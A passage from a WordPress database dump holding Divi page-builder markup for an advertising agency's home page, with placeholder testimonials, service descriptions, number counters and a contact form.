text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 11:48:42','2020-08-07 11:48:42','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (460,1,'2020-08-07 11:55:59','2020-08-07 11:55:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" 